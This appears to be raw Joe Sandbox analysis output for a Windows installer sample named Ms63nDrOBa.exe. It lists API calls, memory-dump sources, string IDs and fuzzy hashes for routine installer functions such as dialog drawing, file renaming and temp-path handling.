                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00404171
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041C2
                                                  • GetDlgItem.USER32(?,00000003), ref: 00404268
                                                  • ShowWindow.USER32(00000000,?), ref: 00404289
                                                  • EnableWindow.USER32(?,?), ref: 0040429B
                                                  • EnableWindow.USER32(?,?), ref: 004042B6
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042CC
                                                  • EnableMenuItem.USER32(00000000), ref: 004042D3
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042EB
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042FE
                                                  • lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404328
                                                  • SetWindowTextW.USER32(?,007A1748), ref: 0040433C
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404470
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID:
                                                  • API String ID: 1860320154-0
                                                  • Opcode ID: b08647c02fb37b41973a387d7810d7f5d0e6d787a748a85b5b12ca029d29054f
                                                  • Instruction ID: c568fb1f9e303522a8696359bfc4ff9199fb68b2c3e72f23d40ed4e3cc12537a
                                                  • Opcode Fuzzy Hash: b08647c02fb37b41973a387d7810d7f5d0e6d787a748a85b5b12ca029d29054f
                                                  • Instruction Fuzzy Hash: D3C1C0B1500604ABDB206F61EE85E2A3A68FBD6759F00853EFA51B51F0CB3D5881DB2D
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404710
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404724
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404741
                                                  • GetSysColor.USER32(?), ref: 00404752
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404760
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040476E
                                                  • lstrlenW.KERNEL32(?), ref: 00404773
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404780
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404795
                                                  • GetDlgItem.USER32(?,0000040A), ref: 004047EE
                                                  • SendMessageW.USER32(00000000), ref: 004047F5
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404820
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404863
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404871
                                                  • SetCursor.USER32(00000000), ref: 00404874
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040488D
                                                  • SetCursor.USER32(00000000), ref: 00404890
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048BF
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: N$E@
                                                  • API String ID: 3103080414-3433303851
                                                  • Opcode ID: 222016cd200aa2e6cb1c1b10df294e93f696a380f153465af12d712dc680f444
                                                  • Instruction ID: bdd40037bb0d452aa3b0c6711a4aa3bdd99b9424e38a8cf4b21d92dd7aac4ea1
                                                  • Opcode Fuzzy Hash: 222016cd200aa2e6cb1c1b10df294e93f696a380f153465af12d712dc680f444
                                                  • Instruction Fuzzy Hash: CB61C2B5900609BFDB10AF61DD85A6A7B69FB84304F00843AF701B62D0C77C9D61DF99
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406315,?,?), ref: 004061B5
                                                  • GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061BE
                                                    • Part of subcall function 00405F89: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                    • Part of subcall function 00405F89: lstrlenA.KERNEL32(00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                  • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061DB
                                                  • wsprintfA.USER32 ref: 004061F9
                                                  • GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?,?,?,?,?), ref: 00406234
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406243
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040627B
                                                  • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062D1
                                                  • GlobalFree.KERNEL32(00000000), ref: 004062E2
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062E9
                                                    • Part of subcall function 00406024: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Ms63nDrOBa.exe,80000000,00000003), ref: 00406028
                                                    • Part of subcall function 00406024: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040604A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]$Mz$Uz$Uz
                                                  • API String ID: 2171350718-3350566011
                                                  • Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                                  • Instruction ID: 1eba4fe57778a2caeea4241fd1a0165fec623ab6fc85672a9c0ceb4c44b2574e
                                                  • Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                                  • Instruction Fuzzy Hash: CC312470600715BBD2207B619D49F6B3B5CDF82744F16017EFA02B62C2EA7DD820867D
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,007A7260,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
                                                  • Instruction ID: f4bc5d4286e22692ddece56c15c19c5fca937d6aefcb7484b61e28148d91a738
                                                  • Opcode Fuzzy Hash: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
                                                  • Instruction Fuzzy Hash: 3F418A71804209AFCF058FA5CE459BFBBB9FF45314F00802EF591AA1A0CB389A55DFA4
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(007A6200,00000400), ref: 00406693
                                                  • GetWindowsDirectoryW.KERNEL32(007A6200,00000400,00000000,007A0728,?,?,00000000,00000000,0079B1EE,762323A0), ref: 004066A9
                                                  • SHGetPathFromIDListW.SHELL32(00000000,007A6200), ref: 00406707
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406710
                                                  • lstrcatW.KERNEL32(007A6200,\Microsoft\Internet Explorer\Quick Launch), ref: 0040673B
                                                  • lstrlenW.KERNEL32(007A6200,00000000,007A0728,?,?,00000000,00000000,0079B1EE,762323A0), ref: 00406795
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406664
                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406735
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4024019347-730719616
                                                  • Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                                  • Instruction ID: 3bd779c8658dd38474262f04f34df11dc98fe6ff926310c24388666a45315c92
                                                  • Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                                  • Instruction Fuzzy Hash: 4C6123716046019BD720AF24DD80B6A77E8AB95318F25063FF687B33D1DA3C8961875E
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404537
                                                  • GetSysColor.USER32(00000000), ref: 00404575
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404581
                                                  • SetBkMode.GDI32(?,?), ref: 0040458D
                                                  • GetSysColor.USER32(?), ref: 004045A0
                                                  • SetBkColor.GDI32(?,?), ref: 004045B0
                                                  • DeleteObject.GDI32(?), ref: 004045CA
                                                  • CreateBrushIndirect.GDI32(?), ref: 004045D4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction ID: fafa423c3d5d8bdb364a41ac4aaa45114b780d6afda8d36e4a103189301150f1
                                                  • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction Fuzzy Hash: 242153B1500704ABCB359F39DD08A5B7BF8BF41714F14892EEB96A22E0D738E944CB54
                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                    • Part of subcall function 00406105: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D6,00000000,00000000,?,00000000,00000011), ref: 0040611B
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: 20294edbd6775d22b81a0ff36bbb0989563b2d3368df465689f6e0dcb3bf3618
                                                  • Instruction ID: ad829204a8421b16aaf2dc4ab9086753538d66bd122375994c0f550e7c4a5b44
                                                  • Opcode Fuzzy Hash: 20294edbd6775d22b81a0ff36bbb0989563b2d3368df465689f6e0dcb3bf3618
                                                  • Instruction Fuzzy Hash: 8551FA75D0411AABDF24DF94CA84AAEBBB9FF04344F10817BE941B62D0D7B49D82CB58
                                                  APIs
                                                  • lstrlenW.KERNEL32(007A0728,00000000,0079B1EE,762323A0,?,?,?,?,?,?,?,?,?,004033FA,00000000,?), ref: 004055F1
                                                  • lstrlenW.KERNEL32(004033FA,007A0728,00000000,0079B1EE,762323A0,?,?,?,?,?,?,?,?,?,004033FA,00000000), ref: 00405601
                                                  • lstrcatW.KERNEL32(007A0728,004033FA), ref: 00405614
                                                  • SetWindowTextW.USER32(007A0728,007A0728), ref: 00405626
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040564C
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405666
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405674
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                                  • Instruction ID: 2aa9806f2f20795f51ccdab708f13b580d3c68b3f08286e5c277b3a8c7657607
                                                  • Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                                  • Instruction Fuzzy Hash: 9F21A175900518BACF119F65DD44ADFBFB9EF85354F10843AF904B22A0C7794A40CFA8
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,007B3000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406845
                                                  • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406854
                                                  • CharNextW.USER32(?,007B3000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406859
                                                  • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 0040686C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-826357637
                                                  • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                  • Instruction ID: 1b09f5ceaf5ae9834212bd1c7625b2fa446eb07de75e5307cf61d1a9d5c412e4
                                                  • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                  • Instruction Fuzzy Hash: F411C46780221295DB303B54CC44AB7A2A8EF94790F52C43FED8A732C0E77C5C9286BD
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E89
                                                  • GetMessagePos.USER32 ref: 00404E91
                                                  • ScreenToClient.USER32(?,?), ref: 00404EAB
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EBD
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction ID: 5c8f3b82e3fec6324f9bbbe2439b20c808b00c1b0a410ced479a2b1fdaf2ea9b
                                                  • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction Fuzzy Hash: 58015E7290021DBADB00DB94DD85FFEBBBCAF95711F10412BBA51B61D0D7B49A018BA4
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                  • MulDiv.KERNEL32(000DC6D3,00000064,000DC6D7), ref: 00402FE1
                                                  • wsprintfW.USER32 ref: 00402FF1
                                                  • SetWindowTextW.USER32(?,?), ref: 00403001
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402FEB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                                  • Instruction ID: ee21eaa8db301b2ce928a6645e07ba1980cadc5c51e80129ae912554bbca5152
                                                  • Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                                  • Instruction Fuzzy Hash: 70014F7064020DBBEF209F60DE4AFAE3B79AB04344F108039FA12A51D0DBB99A559B58
                                                  APIs
